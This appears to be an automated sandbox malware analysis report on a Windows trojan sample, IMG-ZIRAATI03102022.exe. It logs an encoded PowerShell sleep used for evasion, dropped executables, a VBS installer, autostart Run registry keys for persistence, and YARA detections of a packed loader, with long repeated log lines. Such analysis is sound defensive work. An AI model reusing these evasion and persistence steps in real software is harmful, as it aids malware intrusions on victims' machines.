              Source: unknownProcess created: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess created: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\FILE.exe "C:\Users\user\AppData\Roaming\FILE.exe"
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess created: C:\Users\user\AppData\Roaming\FILE.exe C:\Users\user\AppData\Roaming\FILE.exe
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==Jump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess created: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess created: C:\Users\user\AppData\Roaming\FILE.exe C:\Users\user\AppData\Roaming\FILE.exeJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeFile created: C:\Users\user\AppData\Roaming\FILE.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrxaxftx.vxf.ps1Jump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/15@10/5
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: IMG-ZIRAATI03102022.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1840:120:WilError_01
              Source: C:\Users\user\AppData\Roaming\FILE.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-L9LQMY
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_01
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: IMG-ZIRAATI03102022.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: IMG-ZIRAATI03102022.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected Costura Assembly Loader
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.5f60000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.IMG-ZIRAATI03102022.exe.44c45b0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.IMG-ZIRAATI03102022.exe.43c4590.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.5f60000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.IMG-ZIRAATI03102022.exe.44c45b0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.IMG-ZIRAATI03102022.exe.43c4590.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.424695583.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.416884855.0000000002F97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.605296187.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.405974896.000000000437D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: IMG-ZIRAATI03102022.exe PID: 5820, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: FILE.exe PID: 4184, type: MEMORYSTR
              .NET source code contains potential unpacker
              Source: IMG-ZIRAATI03102022.exe, dpin.cs.Net Code: fysh System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: FILE.exe.0.dr, dpin.cs.Net Code: fysh System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.0.IMG-ZIRAATI03102022.exe.ca0000.0.unpack, dpin.cs.Net Code: fysh System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: FILE.EXE.12.dr, dpin.cs.Net Code: fysh System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeFile created: C:\ProgramData\work\FILE.EXEJump to dropped file
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeFile created: C:\ProgramData\work\FILE.EXEJump to dropped file
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeFile created: C:\Users\user\AppData\Roaming\FILE.exeJump to dropped file

              Boot Survival

              barindex
              Creates an undocumented autostart registry key
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run fileJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FILEJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FILEJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
